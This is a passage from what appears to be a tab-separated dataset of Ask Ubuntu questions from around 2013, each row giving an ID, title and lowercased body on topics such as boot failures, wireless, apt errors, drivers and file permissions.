bytes / 512 bytes disk identifier : 0xfed1007e device boot start end blocks id system /dev/sdb1 2048 30722047 15360000 83 linux /dev/sdb2 * 30722048 62529535 15903744 7 hpfs/ntfs/exfat disk /dev/sdc : 8095 mb , 8095006720 bytes 255 heads , 63 sectors/track , 984 cylinders , total 15810560 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xefacefac here is my boot repair log might the failure to load grub 2 be linked to some efi-thing ? all help will be truly appreciated , i 'm actually stuck !
323348	why is the `` connect '' button greyed out when entering the wifi password for wireless networks ?	i have installed ubuntu 13.04 on my lenovo-b-480 machine recently . i am not able to connect to wireless networks . its detecting all the networks available , allowing me to type in the password but not enabling `` connect '' button . looking forward for any useful suggestion .
323349	unable to locate package cloud-client	i want to create a cloud service using cloudstack on ubuntu 12.04 . but , when i try to install management server using this command : sudo apt-get install cloud-client i get this as output , reading package lists ... done building dependency tree reading state information ... done e : unable to locate package cloud-client
323351	how can i fix apt-get autoremove wanting to uninstall most of my packages ?	i did change my packages in synaptic from manually installed to automatically ( they were not manually installed but automatically ) . now they are marked for autoremove . i tested it with sudo apt-get autoremove and the result is shown below ( a reduced version because its almost all packages ) . i remember last year i had same issue and solved it via ubuntu forums but the forum is down and i can not reach the post ! anyone has any idea how to fix this ? sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : unity-asset-pool unity-greeter unity-lens-applications unity-lens-files unity-lens-music unity-lens-photos unity-lens-video unity-scope-gdrive unity-scope-musicstores unity-scope-video-remote unity-services unity-tweak-tool unity-webapps-amazoncloudreader unity-webapps-common unity-webapps-facebookmessenger unity-webapps-gmail unity-webapps-googledocs unity-webapps-googleplus unity-webapps-launchpad unity-webapps-linkedi xserver-xorg-input-wacom xserver-xorg-video-all xserver-xorg-video-ati xserver-xorg-video-cirrus xserver-xorg-video-fbdev xserver-xorg-video-intel xserver-xorg-video-mach64 xserver-xorg-video-mga xserver-xorg-video-modesetting xserver-xorg-video-neomagic xserver-xorg-video-nouveau xserver-xorg-video-openchrome xserver-xorg-video-qxl xserver-xorg-video-r128 xserver-xorg-video-radeon xserver-xorg-video-s3 xserver-xorg-video-savage xserver-xorg-video-siliconmotion xserver-xorg-video-sis xserver-xorg-video-sisusb xserver-xorg-video-tdfx xserver-xorg-video-trident xserver-xorg-video-vesa xserver-xorg-video-vmware xul-ext-unity xul-ext-webaccounts xul-ext-websites-integration y-ppa-manager yad zenity zenity-common zip 0 upgraded , 0 newly installed , 1440 to remove and 0 not upgraded . after this operation , 3,853 mb disk space will be freed . do you want to continue [ y/n ] ?
323352	how do i log usb modem at command output ?	i want to be able to send the command `` at+csq '' to /dev/ttyusb1 every 5 seconds , and log out response to a text file . i can do it manually via screen ( screen /dev/ttyusb1 and type in at+csq and see the response ) , but how do i do this as a bash script ?
323356	ubuntu not booting after installation	i have installed ubuntu 13.04 from usb stick successfully ( as the only os on my computer ) , but after i restarted my pc , my computer tried to boot from cd . i 've inserted my old ubuntu cd that i got from one book and choose `` boot from hard disk '' . then it written ( on black screen of course ) `` booting from hard disk '' or something like that . in next line i had flashing _ , but i could n't type anything . what can i do to at least try re-installing ubuntu ? note : i do n't have internet access on that pc .
323373	which interprets php faster on ubuntu server 12.04 32-bit , apache or nginx ?	i have currently installed apache on my 12.04 32-bit ubuntu server , but i 'm interested into switching to nginx . i have read a number of comparisons and reviews , where nginx is faster than apache serving static content , but these do n't cover php performance . here is my question : how does nginx compare to apache regarding performance of php processing ? is nginx also faster for php ?
323374	run levels only at start up	i find the concept of runlevels very confusing . currently , i 'm trying to run a script only at start up . but configuring as shown below leads to it working also at halt time . i 'm programming a daemon this way : update.rc-d script.sh defaults 100 also i have tried update-rc-d script.sh start 100 but that does not work either .
323375	software updater problem in 12.10	the problem that i have been reviving is w : gpg error : http : //ppa.launchpad.net quantal release : the following signatures could n't be verified because the public key is not available : no_pubkey d1106511179518b2 , w : failed to fetch gzip : /var/lib/apt/lists/partial/archive.ubuntu.com_ubuntu_dists_quantal_main_source_sources hash sum mismatch , w : failed to fetch gzip : /var/lib/apt/lists/partial/ppa.launchpad.net_mozillateam_firefox-next_ubuntu_dists_quantal_main_binary-i386_packages hash sum mismatch , e : some index files failed to download . they have been ignored , or old ones used instead . a fix wood be great . ( trust my luck , it 's simple fix )
323376	flash & graphic-card problems : 82865g integrated graphics controller	i 'm a new ubuntu user and installed 13.04 on a computer that used to run on xp . since i installed ubuntu i had some troubles : unity is not launching : so i use the gnome interface the flashplayer-plugin was installed but it is n't working on chromium or firefox . i got this image ( it might not show : the website tells me i need 10 reputation ) : this is the image url : https : //01.org/sites/default/files/users/u5193/capture_du_2013-07-23_112436.png my graphic card was n't recognised in configuration > details so i tried these : i tried using the mesa-utils i tought it might be the driver . i updated the drivers with the linux graphic installer . but did n't get any change : flash still glitching graphic card/controller remains unknown the graphic card is a 82865g integrated graphics controller the current settings are : bits : 32 bits clock : 33mhz fonctionnalités : pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 ressources : irq:16 mémoire : f0000000-f7ffffff mémoire : ff280000-ff2fffff porte/s : ec00 ( taille=8 )
323386	missing icons in context menu in ubuntu 12.04	i 'm running ubuntu 12.04 and was wondering why no icons are shown in the context menu . here an example if i right click on the desktop . can i somehow enable the icons to be shown ? thank you !
323388	ubuntu is n't loading anymore	i 've been dual booting windows 7 & ubuntu 12.04 lts since last 3 months . i made partitions and all and it was working excellent during these couple of months . but suddenly ubuntu has stopped to boot . during booting i get the prompt to select either windows or ubuntu , then some kind of boot message is displayed , but after that it displays just nothing . i can log into windows and when i check in my computer the partition i made for ubuntu is just invisible . i dedicated around 180 gb of my hard disk for ubuntu but now it shows nothing . i mostly use ubuntu now so help me as most of my files are now on it . thanks in advance .
323390	xubuntu 13.04 ccc requires reboot ?	ccc requires a reboot every time i enable or disable a screen . since i do it at least 8 times a day , this is n't acceptable for me . how do i get around this issue ? ! i 'm running the official amd catalystâ˘ 13.4 driver and i 'm using sudo amdcccle to start ccc . the system is amd64 .
323392	how to access shared folders in ubuntu vm ( oracle virtualbox ) and link them to the home folder	i have configured a shared folder between the windows host and ubuntu guest . the folder mounts at start up but its empty ( it also has a padlock sign. ) . i have to run the command below to access its content ( the padlock sign disappears ) . sudo mount.vboxsf media ~/media how can i configure it to be run automatically at start up . i 've tried adding to the start up programs but nothing happens . am new to linux so try to put your answer in a layman 's language . thanks .
323396	how to install huawei mobile partner 21 in ubuntu	we ca n't send smss , ussd codes , make calls or get data usage from huawaei 3g dongles/data cards without huawei mobile partner . how do we install it ?
323403	my ubuntu crashes and an error screen appears	my ubuntu crashes after it has started and it prints some weird stuff like on dos . i tried using ubuntu rescue remix but it said that there were some firmware missing b43-open/ucode.fw ; b43/ucode.fw it then directed me to a website to download the firmware . how am i supposed to install them when my ubuntu crashes every time i start ?
323404	right-click on touchscreen does not work	how can i make the right-click work on my touchscreen ? i tried it with the touchegg multitouch gesture application , and the function just stays where it was left the last time the cursor was when i was using the touchpad . thanks in advance .
323408	how to install and execute icecat 17.0 from tar file	how do i get the icecat 17.0 browser setup to run from the desktop , after i have untarred the tar file and created a folder for it ? i 'm using ubuntu 10.04 lts and i have tried using the system- > preferences- > preferred applications to set it up through the `` web browser '' function . pa will not let me point to the folder and the shell `` icecat '' ( not icecat-bin , of course ) and make it work from the desktop icon . i have already checked the box to make it executable ; but i ca n't get any further with it . otherwise it will not load from a direct double click , either . what am i doing wrong ? i have asked this question in a forum called `` the cafe '' on the ubuntu-discourse.org site . i did get some suggestions , and i tried them all with no success . i was told it would be good to start my own thread ; but i decided to ask my question here . i 'd be grateful for any help at all . ira fromm
323409	excel 2010 : how do i change the look of the dialog box ( s ) /pop-up windows ?	i installed ms office 2010 on ubuntu 12.04.2 , and everything looks normal and functions as it would on a normal windows machine . except : when i click save , or save as , the dialog box looks like its from windows 98 or something . it shows up as the old gray , square , boxy type ; rather than the faded/tinted blue , rounded corners , eye candy we 've come to expect from microsoft . how do i change this ? is there a setting i can change within excel or word ? i know you can change the appearance of all your programs in windows this way using the start menu ( usually the only reason being to increase performance ) , but i 'm using ubuntu and do not have the `` start menu '' privilege . it 's just strange that the word and excel programs open and look perfect , but the `` save '' / '' save as '' dialog boxes look like they 're from windows 98 ... actually , now that i think about it , they look like ubuntu dialog boxes ... so how do i change this within the programs word and excel ? ( i 'm assuming the answer , whatever it is , applies to ppt , outlook , and onenote as well ) here is a screen shot of what i 'm looking at : here is another screen shot from when i click on the 'page layout ' tab , then click the bottom right hand arrow under 'page setup ' :
323411	turn on touchpad momentum feature in ubuntu	i am using both ubuntu 13.04 and windows . i am used to touchpad momentum feature in windows using my driver software for synaptic touchpad , but i can not use that feature in ubuntu as only a few multi touch features can be enabled . i installed synaptiks in ubuntu , but it does not provide that momentum feature . is there any way to enable touchpad momentum feature in ubuntu ? thank you .
323416	can not open gnome-terminal in normal user mode from root user mode	when i issue `` gnome-terminal '' command as a root user it is opening a new terminal in root user mode only . now my question is that `` is there any way to open a new terminal in normal user mode even when we issue 'gnome-terminal ' command from root user mode ? '' `` 'xyz # ' gnome-terminal '' should open a new terminal with `` xyz : ~ $ '' prompt .
323419	enter path written in a file	i 'm writing a code with fortran and i have several different output saved in different directory . during the do cycle i saved the temporary path of the output in a file.txt now i 'm trying to plot the results runtime , but i need to enter the path of the output to use allways the same gnuplot script . i want to if is possibile from terminal ( shell ) to enter into the path written in file.txt , that is read the path from my file.txt and enter in path with cd command . i tried with cat but nothing happends ! anyone can help me ?
323421	thinking of switching to ubuntu , can it do all the following things ?	sorry for the basic question , but can ubuntu : access microsoft skydrive , on which some important documents are stored ; access microsoft zune , which is how i get music onto my windows phone , or can it provide a service that 's more or less as easy to use ; play specific games i 've downloaded from gog.com ? hopefully the answer is `` yes ! '' to all the above ! thanks all !
323432	ubuntu 12.04 error : no such device	error : no such device : 4651562a-cb9a-4020-9369-24cad879c4c9 grub recovery > this line comes after the installation is over and when i restart the computer the above line appears . now how do i do a grub recovery .
323435	how do you get netflix-desktop to run for multiple users ?	netflix-desktop keeps telling me i do not have extended filesystem enabled on the guest account . i would like to allow my sister to watch netflix on my laptop without giving her my password .
323437	how to prevent wine from adding file associations ?	wine automatically adds certain mimetypes and file associations ( e.g . notepad.exe for .ini files ) . there already is an answer that explains how to remove these associations . but how can one prevent wine from adding them again and again ?
323438	install printer usb router	i have ubuntu 12.04 and connecting the printer directly via usb print perfectly but i want to have it connected to the usb port of my router and print through there , as i have in windows xp and from which it works perfectly . i have searched information about it but im miss . im trying adding as network printer or lpd url socket nor anything , in each case indicates to me a diferent state sorry for the englih level . any idea ? thank you very much
323452	ubuntu 12.04 on a netbook	iâ´m using ubuntu 12.04 with unity 2d on a samsung nc110p netbook , but is terribly slow . i have 2gb of ram and an multicore intel atom 1.60ghz processor with hyperthring . please help
323453	ubuntu on windows 7	i have a computer with windows 7 and want to install ubuntu and start asking me which operating system to start on how to do this ?
323458	can i install ubuntu on a samsung galaxy fit ?	i have a samsung galaxy fit gt-s5670l with android 2.3.5 and i whant to install ubuntu on it with out modifying the android . itâ´s that possible ?
323460	scite wo n't remember recent files , even though preferences are set correctly	i 'm running lubuntu and scite . i 've never had this problem in the past with scite , but recently it 's stopped remembering the session and the recent files . i have the following set in global options : save.recent=1 save.session=1 and though that 's always worked in the past , it does n't work now . ( when i run `` sudo scite '' , it does remember the recent files that i open , but only the ones i 've opened under sudo . ) happy to answer any questions you might have , and thanks in advance .
323466	which version of ubuntu support hp proliant ml350e gen8 server ?	which version of ubuntu support hp proliant ml350e gen8 server ? ? will in future versions of ubuntu , the raid 5 will be supported ?
323473	install touch on nexus 4 , via trisquel in vm on macair	phone verifies unlocked . trisquel can see the nexus via usb update and upgrade run successfully . terminal reports successful restart . android bootloader comes up on the nexus terminal reports < waiting for device > usb debugging connected developer mode enabled . i feel as if i am missing one small , simple , step . anyone out there know what it might be ? thanks in advance .
323474	saving files..all lost after shutdown and settings	i cant understand it ... no matter what file i save , .jpg . music , text doc . or even session password for gmail ... once i turn off the computer they are all gone . ! is this a security setting that i have to change ?
323477	how to dual boot on dell inspiron 3521 laptop preinstalled with windows 8 ?	i recently bought a dell inspiron 3521 ( 15” , intel i3 processor , 4gb ram , 500gb hard drive , a07 bios from insydeh2o ) with windows 8 pre-installed . i expected to be able to install ubuntu 12.04.2 from cd and dual-boot , as i do with my other main laptop ( which has windows 7 ) . 95 % of my work is done under ubuntu , but i want to preserve access to windows for a few things that require it . this turned out to be much harder than i expected . forums provided conflicting and misleading info . no bios manual is available and dell technical support didn’t officially want to help me as they said ubuntu was unsupported ( though some of the techss were nice to me and gave me some suggestions , unfortunately useless ) . questions : can you boot from a cd under uefi ? will the installation work if i boot ubuntu in legacy mode ? should i have secure boot enabled or disabled ? why doesn’t the ubuntu installer see the windows system ? if i repartition the drive manually , how should i do it ? but mostly , what is the overall strategy for getting ubuntu installed alongside windows on this machine ? i’m an experienced user , but i don’t normally have to deal with technical boot issues or partitioning . if i can’t figure it out , will it work to just trash the windows installation and install ubuntu on the whole drive ? here is my boot-repair info : http : //paste.ubuntu.com/5902327 1 . legacy mode or uefi ? the bios offers the option to switch between legacy mode and uefi . booting from the ubuntu cd in legacy mode is no problem . but if i do that and install ubuntu , won’t it be a problem that ubuntu was installed as legacy and windows as uefi ? i thought it was better to install ubuntu from a cd booted under uefi , and imagined i would be able to boot from the cd under uefi by changing the bios settings to allow booting from cd . there is a tab in the uefi section of the bios called “add boot option” which on the face of it seems to offer a way to do this . if i select “add boot option , ” it asks for a name for the new boot option and then you can choose a file system and file path . but the only two file systems presented as options appear to be two partitions of the hard drive ( they have very long names starting with acpi ) . and there is no info anywhere on what to put in as the file path . interestingly , when i made recovery disks for the windows system and tried to boot from them under uefi , it recognized them , and then briefly presents the cd under the following file system name in the uefi menu : acpi ( pnp0a03,0 ) /pci ( 1fi2 ) /sata ( 2,0,0 ) /cdrom ( entry 1 ) . 2 . if i use uefi , should i have secureboot enabled ? also , should have the legacy oprom on and what does that mean anyway ? should i have secureboot in standard or custom mode ? note that i already disabled fast startup in the windows 8 settings . 3 . why doesn’t the ubuntu installer see windows 8 ? when i boot the ubuntu cd in legacy mode , and start the process of installing ubuntu , it doesn’t see the windows 8 os . it just gives me two options : “erase the disk and install ubuntu” and “do something else.” it doesn’t give me the “install ubuntu alongside other operating systems” option . 4 . how can i edit the partition table to give ubuntu space on the hd ? if i then click on “do something else , ” the partition table comes up with 6 partitions all of which are being used by windows . can i edit and rearrange the partitions to get ubuntu to work ? if so , how ? update after much trial and error i figured out the reason for my problem . i was using an ubuntu 12.04.2 image which had no efi folder or other efi boot information . ( this despite the assurances everywhere that ubuntu 12.04.2 is uefi compatible . admittedly , i downloaded the image from a mirror rather than from the official ubuntu website ) . without an efi folder , efi boot managers ( whether the built-in dell one or refind ) do not recognize the ubuntu image as bootable . i downloaded another ubuntu image and presto , it was recognized , and i was able to install it correctly . ( although i did have to shrink the windows partitions and create partitions for ubuntu manually . )
323486	how can i run .exe files in ubuntu ?	i have lots of windows programs in .exe because i 've changed windows 7 to ubuntu 12.04 . help please
323491	unable to install ubuntu linux 12.04 / 13.04 after downloading file in windows	help ! after i downloaded ubuntu 12.04 and 13.04 desktop version , i find that i ca n't install it , as it does n't work ! it says that its not a valid win32 application and i know it 's not . but why is it that , if i use my very old first version of ubuntu linux desktop that was delivered to me from ubuntu - it can still install normally even though it has no updates . how come this version that i download from your link on the ubuntu website , is not working ? the folder size is 0kb . i really wanted to have the 12.04 version of ubuntu desktop ... i really want to install ubuntu inside my win xp os . i love ubuntu ! ! !
323494	xrandr and nvidia-settings information inconsistent	i have primus , bumblebee , bumblebee-nvidia , nvidia-current , libdrm-nouveau1a , libdrm-noveau2 , and xserver-xorg-video-nouveau-lts-quantal on my machine ( should i delete the noveau stuff ? it seems unnecessary since i have the current nvidia driver installed , but right now my monitor works and i do n't want to break anything - i 've had to clean install three times now ) . the following seems inconsistent to me : ... $ xrandr screen 0 : minimum 320 x 200 , current 1600 x 900 , maximum 8192 x 8192 lvds1 connected 1600x900+0+0 ( normal left inverted right x axis y axis ) 345mm x 194mm 1600x900 60.0*+ 50.0 1440x900 59.9 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) ... $ less /etc/x11/xorg.conf section `` device '' identifier `` default device '' option `` nologo '' `` true '' endsection and , consistent with my xorg.conf file ( but not my actual display , as shown by xrandr ) , when i launch nvidia-settings with optirun , i see the following : i do n't know what `` no scanout '' means , but my screen 's resolution is not 640x480 .
323515	ubuntu 64 bit does not boot on i5 3210m	i 'm trying to install ubuntu 64-bit on my lenovo e530 with i5 3210m cpu . according to this information : http : //www.ubuntu.com/certification/hardware/201202-10641/ it is officially supported . however , when i try to boot from usb flash drive , i get the 'kernel image is corrupt or invalid ' message . i 'm using unetbootin to create a live usb and i 've tried both 13.04 and 12.04.2 isos from official website ( torrent downloads ) . i 've managed to successfully boot with 13.04 32-bit , however . this is what i get from cat /proc/cpuinfo http : //pastebin.com/fepjnkbc so the processor appears to be detected correctly . however , when i do uname -p it shows 'i686 ' . any idea what is wrong here ? uefi secure boot is disabled by the way .
323518	creating an executable on ubuntu 13	i read several answers saying that if i change the file properties to set the 'allow execute as program ' it will allow me to double click the file and it will launch . instead , when i try to do that for an .sh file it just opens it via gedit.. i also tried to chmod ugo+x the file but that did n't help .
323521	back up unable to sign into ubuntu one	i have no idea what the root cause is and i need help troubleshooting so i can figure that out . i noticed that my backup had not happened in 11 days . i tried to do it manually . it brings up a dialog box that says `` connect to ubuntu one '' with the button `` sign into ubuntu one ... '' clicking that does nothing . the button reacts to the click visually but nothing else happens . i went to seahorse and deleted all of my saved ubuntu passwords . it never asks me for my credentials . i do n't know what to do next to determine what the problem is . can anyone help ?
323523	default file open/save sort by modified ?	i 'd like the file open/save dialogues to be sorted by default by modified . i read this answer : set default sort order and it did n't help . i went to : org- > gtk- > settings- > file-chooser and i set the value of key sort-column to `` modified '' , it still sorted by name , so i tried `` size '' , and no luck there either . it still sorts by name . i 'm using lubuntu 12.04 . thanks for any help/suggestions you might have .
323527	boot ubuntu 12.04 directly to a windows rdp session	basically i want to auto start a windows rdp session . turning my ubuntu machine into a thinclient so to speak . purchasing thin-clients is out of the budget . i have windows 2008 server r2 currently set up and running .
323530	adding directory to path environment variable does n't remain in path	i have been trying to get a program called `` passenger-memory-stats '' to run as the super user . the program is installed in the following directory : /usr/local/rvm/rubies/ruby-1.9.3-p327/bin/ruby . i know this because i installed phusion passenger using ruby gems : $ gem env rubygems environment : - rubygems version : 1.8.24 - ruby version : 1.9.3 ( 2012-11-10 patchlevel 327 ) [ x86_64-linux ] - installation directory : /usr/local/rvm/gems/ruby-1.9.3-p327 - ruby executable : /usr/local/rvm/rubies/ruby-1.9.3-p327/bin/ruby - executable directory : /usr/local/rvm/gems/ruby-1.9.3-p327/bin - rubygems platforms : - ruby - x86_64-linux - gem paths : - /usr/local/rvm/gems/ruby-1.9.3-p327 - /usr/local/rvm/gems/ruby-1.9.3-p327 @ global - gem configuration : - : update_sources = > true - : verbose = > true - : benchmark = > false - : backtrace = > false - : bulk_threshold = > 1000 - remote sources : - http : //rubygems.org/ /usr/local/rvm/gems/ruby-1.9.3-p327/bin $ ls -l | grep passenger-memory-stats -rwxr-xr-x 1 guarddoggps rvm 416 dec 14 2012 passenger-memory-stats so obviously the program is there . i then add it to the root user 's path environment variable : $ sudo su export path= $ path : /usr/local/rvm/gems/ruby-1.9.3-p327/bin echo $ path /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : /usr/local/rvm/gems/ruby-1.9.3-p327/bin so now it has been added to path environment variable . i exit from sudo user to my regular user with sudo privilege and i run the following : $ sudo passenger-memory-stats sudo : passenger-memory-stats : command not found sudo -e passenger-memory-stats sudo : passenger-memory-stats : command not found why does it tell me command is not found ? did n't i add it to my sudo user 's path ? so i check : sudo su echo $ path /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games and to my surprise , the directory is no longer in the path . what happened ?
323533	vuze installation	i am beginner for ubuntu 13.04 os . i have downloaded vuze torrent software from vuze wesite as a vuzeinstaller.tar.bz2 file and saved it in my download folder . i have extracted the folder and extracted folder name is vuze . how can i install vuze software from the download folder ?
323534	multiple samba workgroups	samba share `` scanning '' when just clicking on the network tab works perfect when the workgroup setting matches the windows workgroup workgroup = workgroup this is fine for a desktop but when i use my laptop and connect to many networks and try to connect to the network shares nothing shows until i update that line with the current workgroup . i can connect if i know the hostname ( eg smb : //hostname ) windows pc 's list all networks ok , is there a way i can set samba to do the same ? i dont have administrator access to any of the shares and its unlikely the same name will be chosen for the 3 .
323535	ubuntu on old pc	i have an old sempron 1.60ghz single cored pc with 1gb of ram and i want to know what version of ubuntu should install into it ( ubuntu 12.04,12.10,13.04 does not work )
323536	how to define the directory path of a file on my hard disk	i am having a problem when i want ro run a program which is my personal folder /home/student/trap/trap.pl , although i run this program from my hard disk only by defining the directory . the problem is that i need to open a file located in my hard disk running this program , e.g . : perl ~/trap/trap.pl -i < path > < path > is the directory of my file , which is /media/student/my book/microsat/trf_output/concatenated_reads_n10.fasta it does not work . it says that the directory does not exist ... how should i write this ? i have to mention that i 've also tried with ../trf_output/concatenated_reads.fasta and some other ways , but did not succeed .
323540	gcc without g++ ?	i run ubuntu 13.04 ( x86_64 if it matters ) which i recently installed . before , when using 12.10 , i had both gcc and g++ from the beginning . however , with 13.04 after i downloaded gcc-4.8.1 sources i found out i was not able to build it due to lack of a c++ compiler . i tried g++ in console and it said the program was not installed . gcc -v shows c++ among other languages in -- enable-languages . so , the question basically is : how come gcc package does not contain the c++ compiler ( g++ ) ? i know ( well , at least i guess ) i can install it by running sudo apt-get intall g++ but i wonder if i can somehow make my pre-installed gcc package work . maybe linking gcc to g++ or something ? i am pretty sure with ubuntu 12.10 i had g++ from the beginning .
323543	what actually yum does ?	i 've seen that yum command for cento os red hat linux platform . but , i tried with sudo too and it was works . i want to know then what yum actually does ? i am just qurious to know ?
323544	how does ufw handle conflicting rules ?	i recently had the following conflicting rules on ufw 445/tcp allow 192.168.1.0/24 445 deny anywhere 445 deny anywhere ipv6 because i first blocked the 445 to then allow it only on my subnet . i was doing that as part of the samba configuration on my local network and i noticed that such conflicting rules did not impact some of my devices ( 2 pcs and a playstation connecting to the samba server ) but impacted an android phone connecting to the server . i could do some tests here to try to infer how does ufw handle those `` conflicting rules '' , however i though i would probably get a more accurate answer here =d does ufw overwrite the allows on top of the denys ? or how does it handle those type of conflicts ?
323548	how can iâ make the gtk2 font the same as gtk3 ?	for some reason , the gtk2 font is different than it was some time ago . i have n't touched it , iâ ca n't remember what were the circumstances , but it has changed . here 's a screenshot of gedit ( gtk3 ) and firefox ( gtk2 ) side to side : http : //i.imgur.com/rczkxvv.png thanks for your kind help . note : i also have n't found anything font-related in the settings , apart from the large text setting in universal access . is there a way to change the size of the font ? everything is too big by default .
323552	no sound in minecraft 1.6.2	since the update to 1.5 to 1.6 , i have n't had any sound . i 've tried the fallowing : deleted .minecraft folder redownloaded the new launcher replaced lwjgl with the version used in 1.5 ( does n't work because new launcher auto-updates it back to the latest ) changed resource packs . f3+s checked sound files and options none of which fixed it . : ( from what i gather , this is n't the same issue some folks on windows have had , because none of their fixes work for me . so i assume this is a linux issue with java . this is on ubuntu 13.04 64bit , and i 'm using the latest openjdk .
323557	resolving dependencies inside a pbuilder environment instead of on the host system	i 'm attempting to build a package using pbuilder , and would prefer to not install build dependencies on my host computer so i can keep it clean . whenever it try to build a package , i get the following output because i do n't have the dependencies installed . $ pbuilder-dist saucy i386 build nautilus_3.8.2-0ubuntu1.dsc i : logging to /home/notgary/pbuilder/saucy-i386_result/last_operation.log i : using fakeroot in build . i : current time : tue jul 23 20:52:19 bst 2013 i : pbuilder-time-stamp : 1374609139 i : building the build environment i : extracting base tarball [ /home/notgary/pbuilder/saucy-i386-base.tgz ] i : creating local configuration i : copying local configuration w : -- override-config is not set ; not updating apt.conf read the manpage for details . i : mounting /proc filesystem i : mounting /dev/pts filesystem i : mounting /var/cache/pbuilder/ccache i : policy-rc.d already exists i : obtaining the cached apt archive contents i : setting up ccache i : installing the build-deps traceback ( most recent call last ) : file `` /usr/bin/gdebi '' , line 80 , in < module > debi = gdebicli ( options ) file `` /usr/share/gdebi/gdebi/gdebicli.py '' , line 53 , in __init__ `` -- print-architecture '' ] , stdout=pipe ) .communicate ( ) [ 0 ] file `` /usr/lib/python2.7/subprocess.py '' , line 679 , in __init__ errread , errwrite ) file `` /usr/lib/python2.7/subprocess.py '' , line 1249 , in _execute_child raise child_exception oserror : [ errno 2 ] no such file or directory e : pbuilder-satisfydepends failed . i : copying back the cached apt archive contents i : unmounting /var/cache/pbuilder/ccache filesystem i : unmounting dev/pts filesystem i : unmounting proc filesystem i : cleaning the build env i : removing directory /var/cache/pbuilder/build//9113 and its subdirectories how do i update pbuilder so it will resolve the dependencies automatically within it 's own environment ?
323565	install/play minecraft on xubuntu 13.04	iâ´ve just installed xubuntu and installed java on it and i ca n't play minecraft and have no idea how to install it ! could anyone help me !
323566	separate /etc/network/interfaces file	i was wondering if it is possible to separate the configuration from /etc/network/interfaces file into separate files , like one stanza in one file and another stanza in another file ? ( similar to centos ) . or from /etc/network/interfaces file is it possible to call other interfaces files ? my idea is to have ethernet stanzas in one file , vlan 's in another , vpn 's in another , etc ( or something similar ) . by doing it this way , it would be easier for me to edit and parse ( yes i know there are parsers out there ) , but i think by having them separate in different files it would be more organized . i have tried to look for answers in google for several days , and man interfaces but i have n't found anything . i 'm thinking is not possible ( unless modifying source code from the os i guess ) . anyone knows anything about this ? i 'm using ubuntu 12.04 lts server x64 thanks !
323569	ubuntu for a designer ?	i was using ubuntu few years back but unfortunately i had to move to windows : ( but again i think it 's the time to move to ubuntu with a new computer : ) i 'm a web designer , graphic designer . so i love to know , are there any alternatives for adobe photoshop , illustrator & dreamweaver ? i was using those applications with wine ( the windows layer for ubuntu ) because gimp , inkspace & kompozer could n't fill the gap made by adobe applications . also wine does n't work 100 % okay , so it was kinda hard for me to use ubuntu . but now i badly want to move with this kind hearted os . can anyone please let me know is that possible to fill the gap in ubuntu which adobe applications make or will adobe look at linux ?
323571	install a canon canoscan lide 110	how do i install a canon canoscan lide 110 ? i gather from previous postings that it 's possible but it 's not clear to me what to do . i need step by step instructions please . thanks .
323572	youtube laggs in fullscreen	i just installed ubuntu-gnome 32 bit 13.04 on my intel imac , but when i try to watch youtube videos in fullscreen , its very choppy and laggy , is it possible to fix it somehow ? i 'm using adobe flash player 11.7 with chrome pre-installed
323580	install ubuntu 13.10 daily builds on nexus 7	i could be getting a nexus 7 soon ( yay ) . and tempted to take ubuntu unity ( not touch , well later ) , for a spin on it . on the ubuntu wikipage you can install 13.04 on it , which is great , but i am wondering how i could get 13.10 daily builds on the nexus 7 . if it is possible . thank you for your time and answes
323581	how do i download and not pay another 16 bucks ?	i downloaded ubuntu 13.04 ( 64 b ) and donated my 16 bucks , and i can not find it on my computer anywhere .
323582	accidentally recursively changed all file permissions in /run ( ubuntu )	i have a home server running myth , apache , samba , mysql etc . it was late . i was tired . i somehow was one directory level above where i thought i was , and recursively gave the whole world read permissions of /run . ( yes , i know ... ) i assume that certain files within /run are already set up like this , so i do n't want to just recursively remove the permission . as it turns out , i do n't have a backup of this folder ( something else to fix ) . do i just leave it , go for a full reinstall , or is there another option ?
323588	janitor broke my visual interface - xubuntu 12.04	yesterday a performed a couple of updates and after that i have executed janitor ( from within ubuntu-tweak ) to cleanup ( incl . everything , also old kernels ) my system ( xubuntu 12.04.2 , running on a recent dell inspiron 15r , dual boot with windows 8 , hybrid graphics ati7670 ) . this turned out to be a bad mistake , when i power on the laptop and select xubuntu from grub i still do see the xubuntu loading screen , but after that i end up at a command line login ( tty1 ) . my first idea was that i maybe somehow broke the kernel , so i decided to reinstall it - but now change . next , i have checked some log files ( syslog , kern.log , xorg.0.log ) , the kern and sys logs do look ok , but the xorg.0.log gave me some errors . maybe i should add here that iam using the amd catalyst driver ( 12.10.5 ) to control my hybrid graphics setup . the error messages looked as follows : screen 1 deleted because of no matching confg section unloadmodule `` intel '' unloading intel fglrx ( 0 ) : powerexpress : integrated gpu is selected fglrx ( 0 ) : powerexpress : can not start '/usr/lib/fglrx ' no such file or directory i guess thats the problem , anyone any idea what to do ? my next step would be to reinstall catalyst from the commandline ( any suggestions how to that the best way ? ) . since iam relying on this laptop a lot for work i would appreciate any help . best wishes
